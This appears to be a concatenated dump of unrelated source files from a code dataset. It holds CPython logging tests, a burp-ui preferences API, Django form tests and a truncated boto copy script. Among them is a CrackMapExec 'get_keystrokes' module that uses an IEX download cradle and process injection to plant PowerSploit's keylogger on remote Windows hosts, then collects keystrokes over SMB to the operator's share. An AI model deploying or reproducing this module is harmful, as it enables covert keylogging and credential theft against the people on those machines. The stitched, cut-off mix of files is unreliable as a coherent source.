logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist")
self.rmfiles.append(filename)
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".1")
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".2")
self.assertFalse(os.path.exists(self.fn + ".3"))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# test methods added below
pass
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
import time
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
FormatterTest,
LogRecordFactoryTest, ChildLoggerTest, QueueHandlerTest,
RotatingFileHandlerTest,
LastResortTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
| apache-2.0 |
Waffle-Wrath/CrackMapExec | cme/modules/get_keystrokes.py | 1 | 4647 | from cme.helpers.powershell import *
from cme.helpers.misc import gen_random_string
from cme.servers.smb import CMESMBServer
from gevent import sleep
from sys import exit
import os
class CMEModule:
'''
Executes PowerSploit's Get-Keystrokes script
Module by @byt3bl33d3r
'''
name = 'get_keystrokes'
description = "Logs keys pressed, time and the active window"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
TIMEOUT Specifies the interval in minutes to capture keystrokes.
STREAM Specifies whether to stream the keys over the network (default: False)
POLL Specifies the interval in seconds to poll the log file (default: 20)
'''
if 'TIMEOUT' not in module_options:
context.log.error('TIMEOUT option is required!')
exit(1)
self.stream = False
self.poll = 20
self.timeout = int(module_options['TIMEOUT'])
if 'STREAM' in module_options:
self.stream = bool(module_options['STREAM'])
if 'POLL' in module_options:
self.poll = int(module_options['POLL'])
context.log.info('This module will not exit until CTRL-C is pressed')
context.log.info('Keystrokes will be stored in ~/.cme/logs\n')
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Exfiltration/Get-Keystrokes.ps1')
if self.stream:
self.share_name = gen_random_string(5).upper()
self.smb_server = CMESMBServer(context.log, self.share_name, context.log_folder_path)
self.smb_server.start()
else:
self.file_name = gen_random_string(5)
def on_admin_login(self, context, connection):
keys_folder = 'get_keystrokes_{}'.format(connection.host)
if not self.stream:
command = 'Get-Keystrokes -LogPath "$Env:Temp\\{}" -Timeout {}'.format(self.file_name, self.timeout)
else:
command = 'Get-Keystrokes -LogPath \\\\{}\\{}\\{}\\keys.log -Timeout {}'.format(context.localip, self.share_name, keys_folder, self.timeout)
keys_command = gen_ps_iex_cradle(context, 'Get-Keystrokes.ps1', command, post_back=False)
launcher = gen_ps_inject(keys_command, context)
ps_command = create_ps_command(launcher)
connection.execute(ps_command)
context.log.success('Executed launcher')
if not self.stream:
users = connection.loggedon_users()
keys_folder_path = os.path.join(context.log_folder_path, keys_folder)
try:
while True:
for user in users:
if '$' not in user.wkui1_username and os.path.exists(keys_folder_path):
keys_log = os.path.join(keys_folder_path, 'keys_{}.log'.format(user.wkui1_username))
with open(keys_log, 'a+') as key_file:
file_path = '/Users/{}/AppData/Local/Temp/{}'.format(user.wkui1_username, self.file_name)
try:
connection.conn.getFile('C$', file_path, key_file.write)
context.log.success('Got keys! Stored in {}'.format(keys_log))
except Exception as e:
context.log.debug('Error retrieving key file contents from {}: {}'.format(file_path, e))
sleep(self.poll)
except KeyboardInterrupt:
pass
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'Get-Keystrokes.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
# We received the callback, so lets setup the folder to store the keys
keys_folder_path = os.path.join(context.log_folder_path, 'get_keystrokes_{}'.format(request.client_address[0]))
if not os.path.exists(keys_folder_path): os.mkdir(keys_folder_path)
request.wfile.write(self.ps_script2)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_shutdown(self, context, connection):
if self.stream:
self.smb_server.shutdown()
| bsd-2-clause |
ziirish/burp-ui | burpui/api/prefs.py | 1 | 8540 | # -*- coding: utf8 -*-
"""
.. module:: burpui.api.prefs
:platform: Unix
:synopsis: Burp-UI prefs api module.
.. moduleauthor:: Ziirish <[email protected]>
"""
from flask import session, current_app, request
from flask_login import current_user
from werkzeug.datastructures import MultiDict
from . import api
from ..engines.server import BUIServer # noqa
from ..ext.i18n import LANGUAGES
from .custom import fields, Resource
bui = current_app # type: BUIServer
ns = api.namespace("preferences", "Preferences methods")
@ns.route("/ui/hide", endpoint="prefs_ui_hide")
class PrefsUIHide(Resource):
"""The :class:`burpui.api.prefs.PrefsUI` resource allows you to
set your UI preferences.
This resource is part of the :mod:`burpui.api.prefs` module.
"""
parser = ns.parser()
parser.add_argument("name", dest="client", help="Client to hide")
parser.add_argument("agent", dest="server", help="Server to hide")
hidden_model = ns.model(
"HiddenModel",
{
"client": fields.String(description="Hidden client name"),
"server": fields.String(description="Hidden server name"),
},
)
@ns.marshal_list_with(hidden_model, description="Success", code=200)
@ns.doc(
responses={
200: "Success",
403: "Insufficient permissions",
},
)
def get(self):
"""Returns a list of hidden clients/servers
**GET** method provided by the webservice.
:returns: list
"""
if (
bui.config["WITH_SQL"]
and not bui.config["BUI_DEMO"]
and not current_user.is_anonymous
):
from ..models import Hidden
return Hidden.query.filter_by(user=current_user.name).all()
return []
@ns.expect(parser)
@ns.marshal_with(hidden_model, description="Success", code=200)
@ns.doc(
responses={
200: "Success, object not recorder",
201: "Success, object recorded",
403: "Insufficient permissions",
500: "Internal server error",
},
)
def put(self):
"""Hide a client/server
**PUT** method provided by the webservice.
:returns: Object to hide
"""
ret = []
args = self.parser.parse_args()
if (
bui.config["WITH_SQL"]
and not bui.config["BUI_DEMO"]
and not current_user.is_anonymous
):
from ..ext.sql import db
from ..models import Hidden
client = args.get("client") or None
server = args.get("server") or None
hidden = Hidden.query.filter_by(
client=client, server=server, user=current_user.name
).first()
if not hidden:
hide = Hidden(current_user.name, client, server)
db.session.add(hide)
try:
db.session.commit()
except: # pragma: no cover
db.session.rollback()
self.abort(500, "Internal server error")
return hide, 201
return hidden
return ret
@ns.expect(parser)
@ns.doc(
responses={
204: "Success",
403: "Insufficient permissions",
500: "Internal server error",
},
)
def delete(self):
"""Make a client/server visible again
**DELETE** method provided by the webservice.
"""
args = self.parser.parse_args()
if (
bui.config["WITH_SQL"]
and not bui.config["BUI_DEMO"]
and not current_user.is_anonymous
):
from ..ext.sql import db
from ..models import Hidden
hide = Hidden.query.filter_by(
client=(args.get("client") or None),
server=(args.get("server") or None),
user=current_user.name,
).first()
if hide:
db.session.delete(hide)
try:
db.session.commit()
except: # pragma: no cover
db.session.rollback()
self.abort(500, "Internal server error")
return None, 204
@ns.route("/ui", endpoint="prefs_ui")
class PrefsUI(Resource):
"""The :class:`burpui.api.prefs.PrefsUI` resource allows you to
set your UI preferences.
This resource is part of the :mod:`burpui.api.prefs` module.
"""
parser = ns.parser()
parser.add_argument(
"pageLength", type=int, required=False, help="Number of element per page"
)
parser.add_argument(
"language",
type=str,
required=False,
help="Language",
choices=list(LANGUAGES.keys()),
)
parser.add_argument("dateFormat", type=str, required=False, help="Date format")
parser.add_argument("timezone", type=str, required=False, help="Timezone")
@staticmethod
def _user_language(language):
"""Set the current user language"""
if current_user and not current_user.is_anonymous and language:
setattr(current_user, "language", language)
def _store_prefs(self, key, val):
"""Store the prefs if persistent storage is enabled"""
if bui.config["WITH_SQL"] and not bui.config["BUI_DEMO"]:
from ..ext.sql import db
from ..models import Pref
pref = Pref.query.filter_by(user=current_user.name, key=key).first()
if pref:
if val:
pref.value = val
else:
db.session.delete(pref)
elif val:
pref = Pref(current_user.name, key, val)
db.session.add(pref)
try:
db.session.commit()
except: # pragma: no cover
db.session.rollback()
def _update_prefs(self):
"""update prefs"""
args = self.parser.parse_args()
sess = session._get_current_object()
ret = {}
req = MultiDict()
for loc in ["values", "json"]:
data = getattr(request, loc, None)
if data:
req.update(data)
for key in args.keys():
if key not in req:
continue
temp = args.get(key)
if temp:
if key == "language":
self._user_language(temp)
sess[key] = temp
elif key in sess: # pragma: no cover
del sess[key]
ret[key] = temp
self._store_prefs(key, temp)
return ret
@ns.doc(
responses={
200: "Success",
403: "Insufficient permissions",
},
)
def get(self):
"""Returns a list of prefs
**GET** method provided by the webservice.
:returns: prefs
"""
args = self.parser.parse_args()
ret = {}
sess = session
for key in args.keys():
ret[key] = sess.get(key)
return ret
@ns.expect(parser, validate=True)
@ns.doc(
responses={
201: "Success",
403: "Not allowed",
400: "Missing parameters",
},
)
def put(self):
"""Create prefs"""
return self._update_prefs(), 201
@ns.expect(parser)
@ns.doc(
responses={
200: "Success",
403: "Not allowed",
400: "Missing parameters",
},
)
def delete(self):
"""Delete prefs"""
args = self.parser.parse_args()
sess = session
ret = {}
for key in args.keys():
temp = args.get(key)
if temp:
del sess[key]
if bui.config["WITH_SQL"]:
from ..ext.sql import db
from ..models import Pref
try:
Pref.query.filter_by(user=current_user.name, key=key).delete()
db.session.commit()
except: # pragma: no cover
db.session.rollback()
ret[key] = sess.get(key)
return ret
@ns.expect(parser, validate=True)
@ns.doc(
responses={
200: "Success",
403: "Not allowed",
400: "Missing parameters",
},
)
def post(self):
"""Change prefs"""
return self._update_prefs()
| bsd-3-clause |
escottgoodwin/djangolocallibrary | tests/test_forms.py | 2 | 1550 | from django.test import TestCase
# Create your tests here.
import datetime
from django.utils import timezone
from catalog.forms import RenewBookForm
class RenewBookFormTest(TestCase):
def test_renew_form_date_field_label(self):
form = RenewBookForm()
self.assertTrue(form.fields['renewal_date'].label == None or form.fields['renewal_date'].label == 'renewal date')
def test_renew_form_date_field_help_text(self):
form = RenewBookForm()
self.assertEqual(form.fields['renewal_date'].help_text,'Enter a date between now and 4 weeks (default 3).')
def test_renew_form_date_in_past(self):
date = datetime.date.today() - datetime.timedelta(days=1)
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertFalse(form.is_valid())
def test_renew_form_date_too_far_in_future(self):
date = datetime.date.today() + datetime.timedelta(weeks=4) + datetime.timedelta(days=1)
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertFalse(form.is_valid())
def test_renew_form_date_today(self):
date = datetime.date.today()
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertTrue(form.is_valid())
def test_renew_form_date_max(self):
date = timezone.now() + datetime.timedelta(weeks=4)
form_data = {'renewal_date': date}
form = RenewBookForm(data=form_data)
self.assertTrue(form.is_valid())
| mit |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/boto/pyami/copybot.py | 17 | 4262 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
from boto.pyami.scriptbase import ScriptBase
import os, StringIO
class CopyBot(ScriptBase):
def __init__(self):
super(CopyBot, self).__init__()
self.wdir = boto.config.get('Pyami', 'working_dir')
self.log_file = '%s.log' % self.instance_id
self.log_path = os.path.join(self.wdir, self.log_file)
boto.set_file_logger(self.name, self.log_path)
self.src_name = boto.config.get(self.name, 'src_bucket')
self.dst_name = boto.config.get(self.name, 'dst_bucket')
self.replace = boto.config.getbool(self.name, 'replace_dst', True)
s3 = boto.connect_s3()
self.src = s3.lookup(self.src_name)
if not self.src:
boto.log.error('Source bucket does not exist: %s' % self.src_name)
dest_access_key = boto.config.get(self.name, 'dest_aws_access_key_id', None)
if dest_access_key:
dest_secret_key = boto.config.get(self.name, 'dest_aws_secret_access_key', None)
s3 = boto.connect(dest_access_key, dest_secret_key)
self.dst = s3.lookup(self.dst_name)
if not self.dst:
self.dst = s3.create_bucket(self.dst_name)
def copy_bucket_acl(self):
if boto.config.get(self.name, 'copy_acls', True):
acl = self.src.get_xml_acl()
self.dst.set_xml_acl(acl)
def copy_key_acl(self, src, dst):
if boto.config.get(self.name, 'copy_acls', True):
acl = src.get_xml_acl()
dst.set_xml_acl(acl)
def copy_keys(self):
boto.log.info('src=%s' % self.src.name)
boto.log.info('dst=%s' % self.dst.name)
try:
for key in self.src:
if not self.replace:
exists = self.dst.lookup(key.name)
if exists:
boto.log.info('key=%s already exists in %s, skipping' % (key.name, self.dst.name))
continue
boto.log.info('copying %d bytes from key=%s' % (key.size, key.name))
prefix, base = os.path.split(key.name)
path = os.path.join(self.wdir, base)
key.get_contents_to_filename(path)
new_key = self.dst.new_key(key.name)
new_key.set_contents_from_filename(path)
self.copy_key_acl(key, new_key)
